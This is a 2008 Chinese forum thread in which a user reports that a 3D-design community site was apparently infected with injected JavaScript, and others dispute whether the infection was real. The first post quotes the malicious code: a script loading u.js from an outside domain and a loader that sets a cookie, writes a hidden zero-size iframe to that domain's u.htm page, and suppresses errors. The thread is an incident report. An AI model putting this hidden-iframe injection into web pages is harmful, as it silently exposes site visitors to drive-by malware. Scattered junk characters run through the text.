此网被挂马

czy12

马:Hack.Exploit.Script.JS.Mixed.c

1. <script language="javascript" SRC="  ' target=_blank>http://u.cruze3.cn/u.js"></script>
   7 p0 c% w; N' E8 C& C( g, f( \
2. 
   
3. document.writeln("<script>";
   " t5 d. Z! v" h' V! q
4. document.writeln("function oK_Begin(){";
   1 L, k( ~# d$ Z, \7 e$ \: p4 q
5. document.writeln("var Then = new Date() ";
   : w- d: ]& ^5 [* X9 V( ^  l( `
6. document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";
   6 L/ h/ Y6 V% u8 W, f; V
7. document.writeln("var cookieString = new String(document.cookie)";
   
8. document.writeln("var cookieHeader = "Cookie1=" ";
   1 S! e. m3 L: l! Z. ]# g) m
9. document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";
   
10. document.writeln("if (beginPosition != -1){ ";
    8 L2 p4 a- ]/ ~1 }" ?+ F0 G
11. document.writeln("} else ";
    1 \& W+ v/ f) m0 n; Z
12. document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";
    
13. document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";
    9 J& [) w8 X4 X8 u- Q/ x# L
14. document.writeln("}";
    ) M0 U5 u4 V6 c: Z
15. document.writeln("}";
    + |) ~; d: {4 G/ _7 N# p, G6 Y0 W, V
16. document.writeln("oK_Begin();";
    ( x% z5 @, }5 K
17. document.writeln("<\/script>";
    / t$ N# [) y& E: h
18. document.writeln("<script>window.onerror=function(){return true;}<\/script>"
    
19. 
    
20. 
    
21. 
    1 }% r! t1 z5 B3 y0 B  V8 U7 P! |
22. 
    
23. 
    

复制代码

虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马

19720205

请管理员确认是否网页挂马?

cayuer

我的麦咖啡都没检测出来 你什么杀毒软件？

czy12

不是杀软件查的.
& o2 D. U6 x# A/ K1 x3 }只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马.
不过,已经被清理了.

HEHE只是没有礼貌

( K' K& T9 \6 r- p[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]

江南有雪

你这个什么网站，哪里出来的？

ht tp://u.cruze3.cn/u.js

czy12

http://u.cruze3.cn/u.js
3 H; M" W7 A) m  C8 l+ S8 K此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向.
这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.
, \$ n3 [  _9 u4 u4 p5 i% V/ Y8 jHEHE

wwqq

这跟三维有什么关系？

czy12

这是挂在三维网论坛里的.
; ~) `2 h, T3 C  R! o7 ?5 P红线所指

huang_baker

奇怪，为什么我的里面没有？是不是楼主的机器自己带病毒了？

小雪

自己的机子中毒了，就不要满天喊叫了，没人会认为你是一个杀毒的行家

czy12

不学无术.
$ @7 c1 R, p4 i6 H9 g* @; P+ UHEHE

yyywwwhk

但在:
http://www.3dportal.cn/discuz/ 之原始檔
7 {* V4 S9 h7 c( B- g2 L似乎看不见楼主所说的 http://u.cruze3.cn/u.js

3 ^/ q' L2 m  E" _+ N[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]

新洁电子

经过自编扫描代码处理结果，未发现楼主说的挂马代码！

请清理自己计算机的缓冲区！

college

看您的尾符/script，很像是U盘病毒。

czy12

DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。
我也说了：已修复。
0 X/ T/ r4 N3 q& Q3 k5 s8 k4 X
% Q' u% O  S7 Q' C# ops:这与缓存毫无关系。虽然缓存中有U.JS.
4 S& ^$ O! D2 j0 w/ m* B6 }' S4 d但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?
7 U2 T- M% X5 @1 M) m5 J+ F1 O$ E
- H2 I5 }+ M) j* P, \& |5 M7 vscript是个JAVA代码,与U盘何关?

3 y5 W4 E5 k! e+ c# Q* eHEHE

[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]

新洁电子

非也，代码是程序直接采样的当时的网页代码，是自编的，算不上权威，但是可以直接进入部分加密网站！
# h$ R& i, T  x$ j0 B
如果却如你说的修改了，我想，这只有论坛管理员有这个权限，即便是后台也是有记录的。假如确实是论坛后台修改了，一定会给大伙一个说法的。

相反，目前从各方面提供的代码显示，确实“此时此刻”是正常的！至于继续讨论已经无大的价值！